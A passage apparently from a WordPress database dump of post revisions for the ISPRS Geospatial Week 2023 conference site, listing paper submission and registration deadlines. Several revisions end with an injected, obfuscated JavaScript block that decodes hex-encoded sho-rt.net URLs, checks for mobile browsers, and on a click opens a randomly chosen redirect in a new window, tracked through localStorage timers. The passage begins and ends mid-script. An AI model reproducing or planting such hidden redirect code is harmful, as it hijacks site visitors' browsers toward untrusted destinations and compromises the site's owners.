_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-01-30 07:05:02','2023-01-30 07:05:02','',2654,'https://gsw2023.com/?p=3666',0,'revision','',0),
(3667,1,'2023-01-30 07:05:59','2023-01-30 07:05:59','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<h1><b><span style=\"font-size: 18pt;\">Important Dates:</span><u></u><u></u></b></h1>\n<h4>1. Annales (Fully Reviewed Papers):</h4>\n<h6> Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</h6>\n<h6> Full paper Author notification: May 1, 2023</h6>\n<h6> Camera ready paper submission: June 1, 2023</h6>\n<p>&nbsp;</p>\n<h4>2. Archives (Abstract Reviewed Papers):</h4>\n<h6> Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</h6>\n<h6> Abstracts Author notification: May 15, 2023</h6>\n<h6> Camera ready paper submission: June 1, 2023</h6>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-01-30 07:05:59','2023-01-30 07:05:59','',2654,'https://gsw2023.com/?p=3667',0,'revision','',0),
(3668,1,'2023-01-30 07:10:26','2023-01-30 07:10:26','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"25\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\">\n<h1><b>Important Dates:</b></h1>\n</div>\n<h4>1. Annales (Fully Reviewed Papers):</h4>\n<h6> Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</h6>\n<h6> Full paper Author notification: May 1, 2023</h6>\n<h6> Camera ready paper submission: June 1, 2023</h6>\n<h4></h4>\n<h4>\n2. Archives (Abstract Reviewed Papers):</h4>\n<h6> Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</h6>\n<h6> Abstracts Author notification: May 15, 2023</h6>\n<h6> Camera ready paper submission: June 1, 2023</h6>\n</div>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpLast\">\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<h4><b>Registration deadlines</b></h4>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpFirst\"><span style=\"font-size: 14pt;\">• Early bird registration deadline: May 1, 2023</span></p>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpLast\"><span style=\"font-size: 14pt;\">• Late registration deadline: July 1, 2023</span></p>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera 